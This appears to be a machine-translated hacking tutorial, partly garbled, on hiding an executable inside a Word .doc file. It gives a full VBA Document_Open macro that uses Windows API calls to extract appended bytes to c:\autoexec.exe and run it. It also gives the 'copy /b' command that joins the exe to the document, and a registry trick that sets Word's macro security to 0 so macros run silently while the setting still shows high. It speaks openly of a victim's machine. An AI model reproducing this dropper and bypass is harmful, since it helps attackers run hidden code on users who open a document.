This method is very typical! Great!
In fact, this conversion is not a change in the file format, but simply connecting an exe file to the end of a doc file. This doc
Of course, the file is not a document of different words. This document contains macro statements, which can be found in
When running, read and run the exe file data connected to the end of your own file.
This creates an illusion that an exe file is run when the file is opened. (It works like a file bundle !)
Anyone familiar with vb knows that word macros are written using vba. The specific syntax is the same as that of vb, but some methods are not found in vb, such as macro viruses.
It is to use macro copy statements to achieve the purpose of infection. Like vb, we can call windows api when writing macros !! The following describes the api functions required for writing this macro:
1) createfile is used to open a file. The declaration of this function vb is as follows:
Declare function createfile lib "kernel32" alias "createfilea" (byval lpfilename as string,
Byval dwdesiredaccess as long, byval dw1_mode as long, byval lpsecurityattributes
As long, byval dwcreationdistribution as long, byval dwflagsandattributes as long, byval htemplate as long) as long
2) closehandle is used to close the handle of the opened file. The vb declaration of this function is as follows:
Declare function closehandle lib "kernel32" (byval hobject as long) as long
3) readfile is used to read data from the opened file. The declaration of this function vb is as follows:
Declare function readfile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestoread
As long, lpnumberofbytesread as long, byval lpoverlapped as long) as long
4) writefile is used to write read data into a file. The declaration of this function vb is as follows:
Declare function writefile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestowrite
As long, lpnumberofbyteswritten as long, byval lpoverlapped as long) as long
5) setfileponiter moves the file pointer. The declaration of this function vb is as follows:
Declare function setfilepointer lib "kernel32" (byval hfile as long, byval ldistancetomove as long, byval
Lpdistancetomovehigh as long, byval dwmovemethod as long) as long
6) The following is the parameter Declaration of the above functions.
Public const generic_read as long = & h80000000
Public const generic_write as long = & h40000000
Public const file_1__read as long = 1
Public const file_assist_write as long = 2
Public const create_new as long = 1
Public const create_always as long = 2
Public const open_existing as long = 3
Public const open_always as long = 4
Public const truncate_existing as long = 5
Public const invalid_handle_value as long =-1
Public const file_attribute_normal as long = & h80
Now, with these preparations, we can start. Run word2000, open the visual basic Editor, create a new module, and set the above function
And parameter declaration! Return to the Code view of "thisdocument", select the document open event, and enter the code:
Private sub document_open ()
Dim buffer (65536) as byte
Dim h, h2, j, I, k as long
H = createfile (thisdocument. path & "/" & thisdocument. name, generic_read, file_polic_read +
File_into_write, 0, open_existing, 0, 0)
'Open your own doc file in the form of pai_read
H2 = createfile ("c: \ autoexec.exe", generic_write, 0, 0, create_always, 0, 0)
'Create an exe file to store the read data.
If h = invalid_handle_value then
Exit sub
End if
K = setfilepointer (h, 32768, nil, 0)
'Move the file pointer to the junction of the doc file and the exe file.
Do
I = readfile (h, buffer (0), 65536, j, 0)
I = writefile (h2, buffer (0), j, j, 0)
Loop until j <65536
Closehandle (h)
Closehandle (h2)
Shell "c: \ autoexec.exe"
'Run the exe file
End sub
In this way, the macro is compiled. Note that the above setfilepointer function is used: 32768 is saved after you write the macro.
The file size of a good doc file is 32768 on different top. Please note!
You may have questions about how to connect the exe file to the end of the doc file? Put the exe you want to connect to and
This doc file is in the same directory. Run the doc command:
Copy/B xxxx.doc + xxxxx.exe newdoc.doc
In this way, you can ~~~. When you open this newdoc.doc, the macro will read and save the subsequent exe files.
In c: \ autoexec.exe, and then run it. Isn't that scary! However, when your word2000 security is the lowest
To achieve this. Regarding this security issue, we found a small bug in Microsoft. Let's look at the key in the registry:
Hkey_current_user \ software \ microsoft \ office \ 9.0 \ word \ security
Level value. When the security level is 3 (high), The word will not run any macros. When the security level is 2 (medium), The word will ask you if you want to run macros. When the security level is 1 (low ),
Word automatically runs all macros! However, it is easy to find that the security level is set to low. If you are smart, you must think that
What will happen when it changes to 0 !!?? Right! If it is set to 0, the word will show a high security level, but it can automatically run any
!! Is it an exaggeration ?? Like the backdoor in the Registry Editor, is this a ms backdoor?
If you want the victim's machine to accept your doc file and run it smoothly, the most important thing is to keep the word security in the registry.
How can I change the value to 0 ?? There are too many methods. The malicious code of ie alone can be implemented too much. In addition, if the link on the webpage is doc
Ie will automatically download the doc file! Dangerous ms !!
I dare not say this is not a vulnerability, but it is really difficult to prevent it, unless you monitor the Registry one day or do not need word? Too negative
The most important thing is to be careful. never accept anything from strangers! Including non-exe files, we now find that the doc file can
When hiding an exe file, someone may find that other files can hide the exe file, so be careful.
